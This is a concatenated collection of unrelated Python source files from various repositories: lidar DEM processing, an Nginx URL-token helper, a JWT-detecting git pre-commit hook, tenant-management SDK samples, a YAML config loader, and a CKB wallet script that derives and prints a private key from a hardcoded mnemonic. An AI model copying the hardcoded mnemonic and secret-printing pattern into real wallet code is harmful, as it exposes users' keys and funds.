interpolation_type=method_str, sampling_type='CELLSIZE',
sampling_value=cell_size)
arcpy.CopyRaster_management(lidar_raster, no_prj_dem)
arcpy.ProjectRaster_management(no_prj_dem, out_raster=out_dem, out_coor_system=out_spatial_ref)
except arcpy.ExecuteError:
print(arcpy.GetMessages())
print("LAS -> DEM output @ %s" % out_dem)
# Notify the user which units the DEM are in
if out_spatial_ref.linearUnitName == 'Meter':
print('DEM units are Meters')
elif out_spatial_ref.linearUnitName == 'Foot_US':
print('DEM units are Feet')
else:
print('Linear unit name for %s uncertain, please use a PROJECTED COORDINATE SYSTEM' % os.path.basename(out_spatial_ref))
return out_dem
def detrend_prep(dem, flow_poly, aoi_shp, filt_passes, smooth_dist, m_spacing=1, centerline_verified=False):
"""This function takes the Lidar raster, creates a least-cost thalweg centerline from a smoothed raster. Station points are
generated along the centerline at defined spacing (1/20th of channel width is a starting point) which are given the values of the lidar raster.
Args: raster_name, upstream flow polygon, spatial extent (can be raster), station point spacing in ft (3ft is default).
Run first with centerline_verified=False and visually inspect. Run again w/ True to return the [station_points, elevation_table]"""
# Set up environment and output folder
spatial_ref = arcpy.Describe(aoi_shp).spatialReference
arcpy.env.extent = dem
dem_dir = os.path.dirname(dem)
# Initiate temp files folder
temp_files = dem_dir + '\\temp_files'
if not os.path.exists(temp_files):
os.makedirs(temp_files)
# Define input parameters
params = [m_spacing,
smooth_dist] # First item defines XS length and spacing, second item described smoothing distance
if not spatial_ref.linearUnitName == 'Meter':
params = [int(i * 3) for i in params]
filt_passes = int(filt_passes)
if not centerline_verified:
print('Generating smooth thalweg centerline...')
print("Smoothing DEM w/ %sx low pass filters..." % filt_passes)
ticker = 0
filter_out = arcpy.sa.Filter(dem, "LOW")
filter_out.save(temp_files + "\\filter_out%s" % ticker)
while ticker < filt_passes: # Apply an iterative low pass filter 15x to the raster to smooth the topography
filter_out = arcpy.sa.Filter((temp_files + "\\filter_out%s" % ticker), "LOW")
filter_out.save(temp_files + "\\filter_out%s" % (ticker + 1))
ticker += 1
smooth_ras = (dem_dir + "\\filt_ras.tif")
filter_out.save(dem_dir + "\\filt_ras.tif")
# Create least cost centerline from 15x filtered raster
print("Smoothed DEM made, least-cost centerline being calculated...")
lidar_foot = dem_dir + '\\las_footprint.shp'
create_centerline.make_centerline(smooth_ras, aoi_shp, lidar_foot, flow_poly, smooth_distance=10)
for ticker in range(filt_passes + 1): # Delete intermediate filtered rasters
file = (temp_files + "\\filter_out%s" % ticker)
if os.path.exists(file):
try:
shutil.rmtree(file)
except:
print("Could not remove %s " % file)
else:
print("Path %s does not exist and can't be deleted...")
print('Done')
else:
print('Generating thalweg elevation profile...')
centerline = dem_dir + "\\thalweg_centerline.shp"
# Define location of intermediate files, some of which will be deleted
intermediates = ["thalweg_centerline_XS.shp", 'thalweg_station_points.shp', 'thalweg_station_points1.shp',
'sp_elevation_table.dbf']
intermediates = [temp_files + '\\%s' % i for i in intermediates]
# Create a station point shapefile evenly sampling the thalweg centerline
station_lines = create_station_lines.create_station_lines_function(centerline, spacing=params[0],
xs_length=params[0])
station_points = arcpy.Intersect_analysis([intermediates[0], centerline], out_feature_class=intermediates[2],
join_attributes="ALL", output_type="POINT")
station_points = arcpy.MultipartToSinglepart_management(station_points, intermediates[1])
station_points = arcpy.AddXY_management(station_points)
# Extract elevation values from each station point, and export to a .csv file
elevation_table = arcpy.ExtractValuesToTable_ga(station_points, in_rasters=dem, out_table=intermediates[3])
station_points = arcpy.JoinField_management(station_points, in_field="ORIG_FID", join_table=elevation_table,
join_field="SrcID_Feat", fields=["Value"])
# Add fields to override, but first adjust detrending functions
elevation_table = dem_dir + '\\xyz_elevation_table.csv'
elevation_table = file_functions.tableToCSV(input_table=station_points, csv_filepath=elevation_table,
fld_to_remove_override=['FID_thal_1', 'Id_1', 'InLine_FID',
'ORIG_FID'], keep_fields=[])
elevation_df = pd.read_csv(elevation_table)
# Flip rows if upside down
max_loc = elevation_df['LOCATION'].max()
elevation_df.sort_values('LOCATION', inplace=True)
if elevation_df.iloc[0]['Value'] < elevation_df.iloc[-1]['Value']:
loc_list = elevation_df.loc[:, ['LOCATION']].squeeze().to_list()
loc_np = np.array([int(max_loc - i) for i in loc_list])
elevation_df['LOCATION'] = loc_np
elevation_df.sort_values('LOCATION', inplace=True)
elevation_df.to_csv(elevation_table)
# Delete extra files
for j in intermediates[2:]:
delete_gis_files(j)
print("Thalweg elevation profile (.csv) @ %s " % str(elevation_table))
print('Done')
return elevation_table
| 2.25 | 2 |
helper/make_url_secure.py | xei/image-server | 0 | 12795729 | <reponame>xei/image-server
import base64
import hashlib
def generate_url_token(url, secret_key):
md5_digest = hashlib.md5(
("%s %s" % (url, secret_key)).encode("utf-8")
).digest()
base64_encoded = base64.b64encode(md5_digest).decode("utf-8")
# Make the key look like Nginx expects.
token = base64_encoded.replace('+', '-').replace('/', '_').rstrip('=')
return token
def make_url_secure(url, secret_key):
token = generate_url_token(url, secret_key)
return "%s?token=%s" % (url, token)
def main():
SECRET_KEY = "MY_SECRET_KEY"
image_url = "https://img.example.com/img/nowm/watermark.png"
secure_url = make_url_secure(image_url, SECRET_KEY)
print(secure_url)
main() | 2.78125 | 3 |
python_demo_v4_cookbook/data_structure/expand_sequence_one_by_one.py | renhongl/python_demo | 1 | 12795730 |
p = (4, 5)
x, y = p
print(x, y)
data = ['ACMD', 50, 90.1, (2012, 11, 12)]
name, shares, price, date = data
print(name, shares, date)
| 2.765625 | 3 |
train_keras.py | gangeshwark/RareEntityPrediction | 0 | 12795731 | from model_new.config import Config
from model_new.keras_model import KerasModel
from model_new.utils import load_json
config = Config()
model = KerasModel(config)
train_set = load_json('dataset/train.json')
# dev_set = load_json('dataset/dev.json')
# sub_set = dev_set[:config.batch_size * 50]
model.train(train_set, None, None)
| 2.25 | 2 |
Standings/urls.py | pawelad/BLM | 1 | 12795732 | from django.conf.urls import patterns, url
from Standings import views
urlpatterns = patterns(
'',
# ex: /standings/
url(r'^$', views.standings_index, name='index'),
) | 1.53125 | 2 |
.githooks/pre-commit-python.py | eshepelyuk/gloo | 3,506 | 12795733 | #!/usr/bin/python3
# This script runs whenever a user tries to commit something in this repo.
# It checks the commit for any text that resembled an encoded JSON web token,
# and asks the user to verify that they want to commit a JWT if it finds any.
import sys
import subprocess
import re
import base64
import binascii
import unittest
# run test like so:
# (cd .githooks/; python -m unittest pre-commit-python.py)
class TestStringMethods(unittest.TestCase):
def test_jwts(self):
self.assertTrue(contains_jwt(["<KEY>"]))
self.assertTrue(contains_jwt(["<KEY>"]))
def test_ok(self):
self.assertFalse(contains_jwt(["test test"]))
self.assertFalse(contains_jwt(["thisisnotajwteventhoughitisalongstring"]))
def contains_jwt(lines):
jwtPattern = re.compile('JWT|iat|name|sub|alg|exp|k')
raiseIssue = False
for line in lines:
# try to find long (20+ character) words consisting only of valid JWT characters
longTokens = re.findall("[A-Za-z0-9_=-]{20,}", line)
# try to decode any found tokens and see if they look like a JSONfragment
# where :look like a JSON fragment" is defined as "contains any of the words in the 'jwtPattern' regex pattern"
for token in longTokens:
try:
# python's base64 decoder fails if padding is missing; but does not fail if there's
# extra padding; so always add padding
utfOut = base64.urlsafe_b64decode(token+'==').decode("utf-8")
match = jwtPattern.search(utfOut)
if match:
print("Probable JWT found in commit: " + token + " gets decoded into: " + utfOut)
raiseIssue = True
# be very specific about the exceptions we ignore:
except (UnicodeDecodeError, binascii.Error) as e:
continue
return raiseIssue
def main():
#get git diff lines
lines = subprocess.check_output(['git', 'diff', '--staged']).decode("utf-8").split('\n')
# filter out short lines and lines that don't begin with a '+' to only
# test longer, newly added text
filteredLines = list(filter(lambda line : len(line) > 20 and line[0] == '+', lines))
# found a likely JWT, send user through prompt sequence to double check
if contains_jwt(filteredLines):
prompt = "This commit appears to add a JSON web token, which is often accidental and can be problematic (unless it's for a test). Are you sure you want to commit these changes? (y/n): "
failCount = 0
while True:
inputLine = input(prompt).lower()
if len(inputLine) > 0 and inputLine[0] == 'y':
print("OK, proceeding with commit")
return 0
elif len(inputLine) > 0 and inputLine[0] == 'n':
print("Aborting commit")
return 1
elif failCount == 0:
prompt = "Please answer with 'y' or 'n'. Do you wish to proceed with this commit?: "
elif failCount == 1:
prompt = "That's still neither a 'y' nor an 'n'. Do you wish to proceed with this commit?: "
else:
prompt = "You've entered an incorrect input " + str(failCount) + " times now. Please respond with 'y' or 'n' (sans apostrophes) regarding whether or not you wish to proceed with this commit which possibly contains a JWT: "
failCount += 1
else:
print("No likely JWTs found, proceeding with commit")
return 0
if __name__ == "__main__":
sys.exit(main())
| 3.0625 | 3 |
lltk/corpus/fanfic/fanfic.py | literarylab/lltk | 5 | 12795734 | import os
import lltk
from lltk.text.text import Text
from lltk.corpus.corpus import Corpus
class TextFanFic(Text):
pass
class FanFic(Corpus):
TEXT_CLASS=TextFanFic
def compile(self,**attrs):
"""
This is a custom installation function. By default, it will simply try to download itself,
unless a custom function is written here which either installs or provides installation instructions.
"""
return self.download(**attrs)
def load_metadata(self,*x,**y):
"""
Magic attribute loading metadata, and doing any last minute customizing
"""
meta=super().load_metadata()
meta['genre']='FanFiction'
if 'published' in meta.columns:
meta['year']=meta['published'].apply(lambda x: x.split('/')[-1])
meta['year']=meta['year'].apply(lambda y: int('20'+str(y)) if int(str(y)[0])<5 else int('19'+str(y)))
if 'username' in meta.columns:
meta['author']=meta['username']
return meta
| 2.953125 | 3 |
legacy/src/python/etriTools.py | seu0313/Bad-word-filter | 0 | 12795735 | <gh_stars>0
#-*- coding:utf-8 -*-
import os
import json
import base64
import urllib3
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
def transcribe_etri(audio_file_path: str):
"""ETRI 음성처리 모듈입니다. 오디오 파일을 받으면 음성을 인식한 후 `한국어` 텍스트 데이터를 반환합니다.
@status `Accepted` \\
@params `"~/src/python/temp2.wav"` \\
@returns `Response data(str) || -1` """
etri_json_file = os.path.join(BASE_DIR, "deep/etri.json")
etri_key = json.loads(open(etri_json_file).read())
access_key = etri_key["private_key"]
open_api_URL = "http://aiopen.etri.re.kr:8000/WiseASR/Recognition"
language_code = "korean"
file = open(audio_file_path, "rb")
audio_contents = base64.b64encode(file.read()).decode("utf8")
file.close()
request_json = {
"access_key": access_key,
"argument": {
"language_code": language_code,
"audio": audio_contents
}
}
http = urllib3.PoolManager()
try:
res = http.request(
"POST",
open_api_URL,
headers={"Content-Type": "application/json; charset=UTF-8"},
body=json.dumps(request_json)
)
response_json = json.loads(res.data.decode("utf-8"))
response = response_json['return_object']['recognized']
except:
response = response_json['reason']
return response
if __name__ == "__main__":
audio_file_path = os.path.join(BASE_DIR, "src/python/hello.wav")
response = transcribe_etri(audio_file_path)
print(response) # 안녕하세요 오늘도 멋진 하루 되세요 | 2.984375 | 3 |
custos-client-sdks/custos-python-sdk/custos/samples/tenant_management_samples.py | hasithajayasundara/airavata-custos | 10 | 12795736 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from custos.clients.tenant_management_client import TenantManagementClient
from custos.clients.super_tenant_management_client import SuperTenantManagementClient
from custos.clients.identity_management_client import IdentityManagementClient
from custos.transport.settings import CustosServerClientSettings
import custos.clients.utils.utilities as utl
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# create console handler with a higher log level
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
custos_settings = CustosServerClientSettings()
# load APIServerClient with default configuration
client = TenantManagementClient(custos_settings)
admin_client = SuperTenantManagementClient(custos_settings)
id_client = IdentityManagementClient(custos_settings)
token = utl.get_token(custos_settings)
def create_tenant():
contacts = ["2345634324"]
redirect_uris = ["http://localhost:8080,http://localhost:8080/user/external_ids"]
response = client.create_admin_tenant("SAMPLE",
"<EMAIL>", "First Name", "LastName", "email", "admin",
"1234",
contacts, redirect_uris, "https://domain.org/",
"openid profile email org.cilogon.userinfo", "domain.org",
"https://domain.org/static/favicon.png", "Galaxy Portal")
print(response)
def get_tenant():
client_id = "custos-8p4baddxvbiusmjorjch-10000401"
response = client.get_tenant(client_token=token, client_id=client_id)
print(response)
def update_tenant():
client_id = "custos-6nwoqodstpe5mvcq09lh-10000101"
contacts = ["8123915386"]
redirect_uris = ["https://custos.scigap.org/callback ", "http://127.0.0.1:8000/auth/callback/",
"http://127.0.0.1:8000/"]
response = client.update_tenant(token, client_id, "Custos Portal",
"<EMAIL>", "Isuru", "Ranawaka", "<EMAIL>", "isjarana",
"Custos1234",
contacts, redirect_uris, "https://custos.scigap.org/",
"openid profile email org.cilogon.userinfo", "domain.org",
"https://custos.scigap.org/", "Custos Portal")
print(response)
def add_tenant_roles():
roles = [{"name": "testing", "composite": False, "description": "testing realm"}]
response = client.add_tenant_roles(token, roles, False)
print(response)
def add_protocol_mapper():
response = client.add_protocol_mapper(token, "phone_atr", "phone", "phone", "STRING", "USER_ATTRIBUTE", True, True,
True, False, False)
print(response)
def get_child_tenants():
response = client.get_child_tenants(token, 0, 5, "ACTIVE")
print(response)
def get_all_tenants():
response = admin_client.get_all_tenants(token, 0, 5, "ACTIVE")
print(response)
def delete_tenant():
response = client.delete_tenant(token, "<PASSWORD>-pv<PASSWORD>ps<PASSWORD>t-10000000")
print(response)
| 1.726563 | 2 |
pyspark_config/yamlConfig/config.py | Patrizio1301/pyspark-config | 0 | 12795737 | <reponame>Patrizio1301/pyspark-config
"""This module implements abstract config class."""
from abc import ABCMeta
from dataclasses import dataclass
from pathlib import Path
from typing import (Any, Union,Type, Optional)
import yaml
import os
import warnings
from future.utils import raise_from
from enum import Enum
from marshmallow import post_load, Schema
from pyspark_config.errors import *
from dataclasses_json import DataClassJsonMixin
from dataclasses_json.cfg import config
from dataclasses_json.mm import (SchemaType, build_schema, schema)
from dataclasses_json.undefined import Undefined
from dataclasses_json.utils import (_undefined_parameter_action_safe, _get_type_cons,
_handle_undefined_parameters_safe,
_is_collection, _is_mapping, _is_new_type,
_is_optional, _issubclass_safe, CatchAllVar)
from dataclasses_json.core import (_user_overrides_or_exts, get_type_hints,
_decode_letter_case_overrides,
_is_supported_generic,
_support_extended_types,
_decode_dict_keys, _ExtendedEncoder,
_decode_generic,
_decode_items)
from dataclasses_json.api import A
from dataclasses import (MISSING,
fields,
is_dataclass # type: ignore
)
Json = Union[dict, list, str, int, float, bool, None]
from pyspark_config.yamlConfig import create_file_path_field, build_path
def build_schema(cls: Type[A],
mixin,
infer_missing,
partial) -> Type[SchemaType]:
Meta = type('Meta',
(),
{'fields': tuple(field.name for field in fields(cls)
if
field.name != 'dataclass_json_config' and field.type !=
Optional[CatchAllVar]),
# TODO #180
# 'render_module': global_config.json_module
})
@post_load
def make_instance(self, kvs, **kwargs):
return _decode_dataclass(cls, kvs, partial)
def dumps(self, *args, **kwargs):
if 'cls' not in kwargs:
kwargs['cls'] = _ExtendedEncoder
return Schema.dumps(self, *args, **kwargs)
def dump(self, obj, *, many=None):
dumped = Schema.dump(self, obj, many=many)
# TODO This is hacky, but the other option I can think of is to generate a different schema
# depending on dump and load, which is even more hacky
# The only problem is the catch all field, we can't statically create a schema for it
# so we just update the dumped dict
if many:
for i, _obj in enumerate(obj):
dumped[i].update(
_handle_undefined_parameters_safe(cls=_obj, kvs={},
usage="dump"))
else:
dumped.update(_handle_undefined_parameters_safe(cls=obj, kvs={},
usage="dump"))
return dumped
schema_ = schema(cls, mixin, infer_missing)
DataClassSchema: Type[SchemaType] = type(
f'{cls.__name__.capitalize()}Schema',
(Schema,),
{'Meta': Meta,
f'make_{cls.__name__.lower()}': make_instance,
'dumps': dumps,
'dump': dump,
**schema_})
return DataClassSchema
@dataclass
class DataClassJsonMix(DataClassJsonMixin):
@classmethod
def schema(cls: Type[A],
*,
infer_missing: bool = False,
only=None,
exclude=(),
many: bool = False,
context=None,
load_only=(),
dump_only=(),
partial: bool = False,
unknown=None) -> SchemaType:
Schema = build_schema(cls, DataClassJsonMix, infer_missing, partial)
if unknown is None:
undefined_parameter_action = _undefined_parameter_action_safe(cls)
if undefined_parameter_action is not None:
# We can just make use of the same-named mm keywords
unknown = undefined_parameter_action.name.lower()
return Schema(only=only,
exclude=exclude,
many=many,
context=context,
load_only=load_only,
dump_only=dump_only,
partial=partial,
unknown=unknown)
@classmethod
def from_dict(cls: Type[A],
kvs: Json,
*,
infer_missing=False) -> A:
return _decode_dataclass(cls, kvs, infer_missing)
def dataclass_json(_cls=None, *, letter_case=None,
undefined: Optional[Union[str, Undefined]] = None):
"""
Based on the code in the `dataclasses` module to handle optional-parens
decorators. See example below:
@dataclass_json
@dataclass_json(letter_case=Lettercase.CAMEL)
class Example:
...
"""
def wrap(cls):
return _process_class(cls, letter_case, undefined)
if _cls is None:
return wrap
return wrap(_cls)
def _process_class(cls, letter_case, undefined):
if letter_case is not None or undefined is not None:
cls.dataclass_json_config = config(letter_case=letter_case,
undefined=undefined)[
'dataclasses_json']
cls.to_json = DataClassJsonMix.to_json
# unwrap and rewrap classmethod to tag it to cls rather than the literal
# DataClassJsonMixin ABC
cls.from_json = classmethod(DataClassJsonMix.from_json.__func__)
cls.to_dict = DataClassJsonMix.to_dict
cls.from_dict = classmethod(DataClassJsonMix.from_dict.__func__)
cls.schema = classmethod(DataClassJsonMix.schema.__func__)
cls.__init__ = _handle_undefined_parameters_safe(cls, kvs=(), usage="init")
# register cls as a virtual subclass of DataClassJsonMixin
DataClassJsonMixin.register(cls)
return cls
def _decode_dataclass(cls, kvs, infer_missing):
if isinstance(kvs, cls):
return kvs
overrides = _user_overrides_or_exts(cls)
kvs = {} if kvs is None and infer_missing else kvs
field_names = [field.name for field in fields(cls)]
decode_names = _decode_letter_case_overrides(field_names, overrides)
kvs = {decode_names.get(k, k): v for k, v in kvs.items()}
missing_fields = {field for field in fields(cls) if field.name not in kvs}
for field in missing_fields:
if field.default is not MISSING:
kvs[field.name] = field.default
elif field.default_factory is not MISSING:
kvs[field.name] = field.default_factory()
elif infer_missing:
kvs[field.name] = None
# Perform undefined parameter action
kvs = _handle_undefined_parameters_safe(cls, kvs, usage="from")
init_kwargs = {}
types = get_type_hints(cls)
for field in fields(cls):
# The field should be skipped from being added
# to init_kwargs as it's not intended as a constructor argument.
if not field.init:
continue
from typing import GenericMeta
field_value = kvs[field.name]
field_type = types[field.name]
if _is_supported_generic(field_type) and field_type.__args__[0]!=str:
type_param = 'type' in [f.name for f in fields(field_type.__args__[0])]
elif 'type' in field_names:
type_param = True
else:
type_param = False
if field_value is None and not _is_optional(field_type):
warning = (f"value of non-optional type {field.name} detected "
f"when decoding {cls.__name__}")
if infer_missing:
warnings.warn(
f"Missing {warning} and was defaulted to None by "
f"infer_missing=True. "
f"Set infer_missing=False (the default) to prevent this "
f"behavior.", RuntimeWarning)
else:
pass
init_kwargs[field.name] = field_value
continue
while True:
if not _is_new_type(field_type):
break
field_type = field_type.__supertype__
if (field.name in overrides
and overrides[field.name].decoder is not None):
# FIXME hack
if field_type is type(field_value):
init_kwargs[field.name] = field_value
else:
init_kwargs[field.name] = overrides[field.name].decoder(
field_value)
elif is_dataclass(field_type):
# FIXME this is a band-aid to deal with the value already being
# serialized when handling nested marshmallow schema
# proper fix is to investigate the marshmallow schema generation
# code
if is_dataclass(field_value):
value = field_value
else:
value = _decode_dataclass(field_type, field_value,
infer_missing)
init_kwargs[field.name] = value
elif _is_supported_generic(field_type) and field_type != str and not type_param:
init_kwargs[field.name] = _decode_generic(field_type,
field_value,
infer_missing)
elif _is_supported_generic(field_type) and field_type.__args__[0] != str and type_param:
init_kwargs[field.name] = _decode_generic_subsets(field_type,
field_value,
infer_missing)
else:
init_kwargs[field.name] = _support_extended_types(field_type,
field_value)
return cls(**init_kwargs)
def _decode_generic_subsets(type_, value, infer_missing):
if value is None:
res = value
elif _issubclass_safe(type_, Enum):
# Convert to an Enum using the type as a constructor.
# Assumes a direct match is found.
res = type_(value)
# FIXME this is a hack to fix a deeper underlying issue. A refactor is due.
elif _is_collection(type_):
if _is_mapping(type_):
k_type, v_type = getattr(type_, "__args__", (Any, Any))
# a mapping type has `.keys()` and `.values()`
# (see collections.abc)
ks = _decode_dict_keys(k_type, value.keys(), infer_missing)
vs = _decode_items(v_type, value.values(), infer_missing)
xs = zip(ks, vs)
else:
xs = (_decode_dataclass(getSubclass(type_,v), v, infer_missing)
for v in value)
# get the constructor if using corresponding generic type in `typing`
# otherwise fallback on constructing using type_ itself
try:
res = _get_type_cons(type_)(xs)
except (TypeError, AttributeError):
res = type_(xs)
else: # Optional or Union
if not hasattr(type_, "__args__"):
# Any, just accept
res = value
elif _is_optional(type_) and len(type_.__args__) == 2: # Optional
type_arg = type_.__args__[0]
if is_dataclass(type_arg) or is_dataclass(value):
res = _decode_dataclass(type_arg, value, infer_missing)
elif _is_supported_generic(type_arg):
res = _decode_generic(type_arg, value, infer_missing)
else:
res = _support_extended_types(type_arg, value)
else: # Union (already decoded or unsupported 'from_json' used)
res = value
return res
def getSubclass(cls, values):
"""
In case one of the fields is called type, the corresponding
subclass is searched for.
"""
try:
subclass_map = {subclass.type: subclass for subclass
in cls.__args__[0].__subclasses__()}
except:
raise
try:
return subclass_map[values['type']]
except KeyError:
raise Exception("Type "+values['type']+" not available.")
@dataclass
class YamlDataClassConfig(DataClassJsonMix, metaclass=ABCMeta):
"""This class implements YAML file load function."""
def load(self, path: str, path_is_absolute: bool = False):
"""
This method loads from YAML file to properties of self instance.
Args:
path: The path in string form; can be relative or absolute.
path_is_absolute: indicates whether the path is an absolute path
"""
path_type=Path(path)
built_path = build_path(path_type, path_is_absolute)
if os.path.exists(path):
if path.endswith('.yaml'):
with built_path.open('r', encoding='UTF-8') as yml:
dictionary_config = yaml.load(yml)
else:
raise InvalidTypeError("Configuration file must "
"be in YAML format: %s"
% str(built_path))
else:
raise NotFoundError("No such file or directory: %s"
% str(built_path))
self.__dict__.update(
self.schema().load(dictionary_config).__dict__
) | 1.84375 | 2 |
acunetix/v11/db/tables/licenses.py | BenDerPan/DScaner | 20 | 12795738 | # uncompyle6 version 2.13.2
# Python bytecode 3.5 (3351)
# Decompiled from: Python 3.5.3 (default, Jan 19 2017, 14:11:04)
# [GCC 6.3.0 20170118]
# Embedded file name: db\tables\licenses.py
from sqlalchemy import *
from sqlalchemy.orm import mapper
from db.tables import metadata
LicensesTable = Table('licenses', metadata, Column('license_key', TEXT, primary_key=True))
class LicenseRow(object):
license_key = None
def __init__(self, license_key):
self.license_key = license_key
def __str__(self):
return 'R_license[%s]' % (self.license_key,)
def __repr__(self):
return self.__str__()
mapper(LicenseRow, LicensesTable) | 2.234375 | 2 |
resources/common_variables.py | enen92/script.retrogames | 3 | 12795739 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
Author: enen92
License: I don't care version 3.0
"""
import xbmc,xbmcgui,xbmcaddon,os
addon_id = 'script.retrogames'
selfAddon = xbmcaddon.Addon(id=addon_id)
datapath = xbmc.translatePath(selfAddon.getAddonInfo('profile')).decode('utf-8')
addonfolder = xbmc.translatePath(selfAddon.getAddonInfo('path')).decode('utf-8')
artfolder = os.path.join(addonfolder,'resources','img')
msgok = xbmcgui.Dialog().ok
platformsave= os.path.join(datapath,'folders.txt')
def translate(text):
return selfAddon.getLocalizedString(text).encode('utf-8')
| 2.078125 | 2 |
python/freq/getfreqs.py | pherna06/server-consumption | 1 | 12795740 | <filename>python/freq/getfreqs.py
from cpufreq import cpuFreq
# CPU control setup
cpu = cpuFreq()
# Get and check current frequencies.
freqs = cpu.get_frequencies()
if not freqs:
print("No frequency reads available.")
exit()
# Print frecuencies by CPU.
print("CPU frequencies (KHz):")
[ print(f"CPU {core}: {freqs[core]}") for core in sorted(freqs) ] | 3.4375 | 3 |
DQM/CSCMonitorModule/python/csc_dqm_masked_hw_cfi.py | ckamtsikis/cmssw | 852 | 12795741 | <reponame>ckamtsikis/cmssw<filename>DQM/CSCMonitorModule/python/csc_dqm_masked_hw_cfi.py<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
#--------------------------
# Masked HW Elements
#--------------------------
CSCMaskedHW = cms.untracked.vstring(
# == Post LS1 - All ME4/2 chambers should be enabled
# == mask most or ME+4/2 chambers, except 9,10,11,12,13
#'1,4,2,1,*,*,*',
#'1,4,2,2,*,*,*',
#'1,4,2,3,*,*,*',
#'1,4,2,4,*,*,*',
#'1,4,2,5,*,*,*',
#'1,4,2,6,*,*,*',
#'1,4,2,7,*,*,*',
#'1,4,2,8,*,*,*',
#'1,4,2,14,*,*,*',
#'1,4,2,15,*,*,*',
#'1,4,2,16,*,*,*',
#'1,4,2,17,*,*,*',
#'1,4,2,18,*,*,*',
#'1,4,2,19,*,*,*',
#'1,4,2,20,*,*,*',
#'1,4,2,21,*,*,*',
#'1,4,2,22,*,*,*',
#'1,4,2,23,*,*,*',
#'1,4,2,24,*,*,*',
#'1,4,2,25,*,*,*',
#'1,4,2,26,*,*,*',
#'1,4,2,27,*,*,*',
#'1,4,2,28,*,*,*',
#'1,4,2,29,*,*,*',
#'1,4,2,30,*,*,*',
#'1,4,2,31,*,*,*',
#'1,4,2,32,*,*,*',
#'1,4,2,33,*,*,*',
#'1,4,2,34,*,*,*',
#'1,4,2,35,*,*,*',
#'1,4,2,36,*,*,*',
# == mask all ME-4/2 chambers
#'2,4,2,*,*,*,*',
)
| 1.25 | 1 |
pymake/__init__.py | CallumJHays/pymake | 1 | 12795742 | from .cache import TimestampCache
from .cli import cli
from .decorator import makes
from .environment import env, PATH
from .shell import sh
from .make import make, make_sync
from .targets import Makefile, Target, Dependencies, Group
from pathlib import Path
__FLAG_IS_PYMAKEFILE__ = True
__all__ = ["TimestampCache", "cli", "makes", "env", "PATH", "Path",
"sh", "make", "make_sync", "__FLAG_IS_PYMAKEFILE__",
"Makefile", "Target", "Dependencies", "Group"]
| 1.773438 | 2 |
superclasses/invetory.py | augusnunes/titanic-escape | 0 | 12795743 |
# player inventory
class Inventory:
'''Classe que representa o inventário do jogador
'''
def __init__(self):
self.itens = []
self.nomes = [] ### implementar isso
def add(self, item):
if type(item) == list:
for i in item:
self.itens.append(i)
self.nomes.append(i.name)
else:
self.itens.append(item)
self.nomes.append(item.name)
def remove(self, name):
for i in range(len(self.itens)):
if self.nomes[i] == name:
self.nomes.pop(i)
self.itens.pop(i)
return True
return False
def check(self, nome_do_item):
'''
Verifica se um item esta no inventario
nome_do_item: str
'''
return nome_do_item in self.nomes
def __str__(self):
title = "\nSeu inventário contém os seguintes itens:\n"
return title + "\n".join(['-'+i for i in self.nomes]) | 3.78125 | 4 |
manager.py | CipherWang/ckb-address-manager | 2 | 12795744 | <gh_stars>1-10
# -*- coding: UTF-8 -*-
from bip_utils import Bip39ChecksumError, Bip39Languages, Bip39MnemonicValidator
from bip_utils import Bip39SeedGenerator
from bip_utils.bip.bip44_base import Bip32
from address import generateShortAddress, CODE_INDEX_SECP256K1_SINGLE, ckbhash
from hashlib import sha256
# load mnemonic & generate seed bytes
mnemonic = "comfort rough close flame uniform chapter unique announce miracle debris space like"
seed_bytes = Bip39SeedGenerator(mnemonic).Generate()
# generate HD root key, ckb path is m/44'/309'/0'/change_or_not/child
bip32_ctx = Bip32.FromSeed(seed_bytes)
bip32_ctx = bip32_ctx.DerivePath("44'/309'/0'/0")
# get childkey at specific location
child_id_uint32 = 220342
child_key = bip32_ctx.ChildKey(child_id_uint32)
sk = child_key.PrivateKey().Raw().ToHex()
pk = child_key.PublicKey().RawCompressed().ToHex()
# generate address
blake160_args = ckbhash(bytes.fromhex(pk))[:40]
address = generateShortAddress(CODE_INDEX_SECP256K1_SINGLE, blake160_args, 'mainnet')
print("Sub Key at %d is:\nPrivatekey = %s\nAddress = %s" % (child_id_uint32, sk, address)) | 1.914063 | 2 |
exercises/palindrome-products/palindrome_products.py | wonhyeongseo/python | 2 | 12795745 | <reponame>wonhyeongseo/python<gh_stars>1-10
def largest_palindrome(max_factor, min_factor):
pass
def smallest_palindrome(max_factor, min_factor):
pass
| 2.375 | 2 |
tests/test_palmetto.py | zojabutenko/palmetto-py | 23 | 12795746 | """Test Palmetto."""
import pytest
from palmettopy.palmetto import Palmetto
from palmettopy.exceptions import CoherenceTypeNotAvailable, EndpointDown, WrongContentType
@pytest.fixture
def words():
"""Load test data fixture."""
words = ["cake", "apple", "banana", "cherry", "chocolate"]
return words
@pytest.fixture
def words_underscore():
"""Load test data fixture."""
words = ['label', 'type', 'character', 'foundation_garment']
return words
@pytest.fixture
def words_no_results():
"""Load test data fixture."""
words = ['label', 'type', 'character', 'subject', 'discipline', 'topic', 'national', 'familycolor', 'fam', 'glotto', 'isoexception']
return words
def test_get_coherence(capsys, words):
palmetto = Palmetto()
coherence = palmetto.get_coherence(words)
assert(coherence == 0.5678879445677241)
def test_get_coherence_fast(capsys, words):
palmetto = Palmetto()
coherence = palmetto.get_coherence_fast(words)
assert(coherence == 1779.6591356383024)
def test_wrong_endpoint(words):
palmetto = Palmetto("http://example.com/nothinghere/")
with pytest.raises(EndpointDown):
coherence = palmetto.get_coherence(words)
def test_wrong_coherence_type(words):
palmetto = Palmetto()
with pytest.raises(CoherenceTypeNotAvailable):
coherence = palmetto.get_coherence(words, coherence_type="asdf")
def test_all_coherence_types(words):
palmetto = Palmetto()
for coherence_type in palmetto.all_coherence_types:
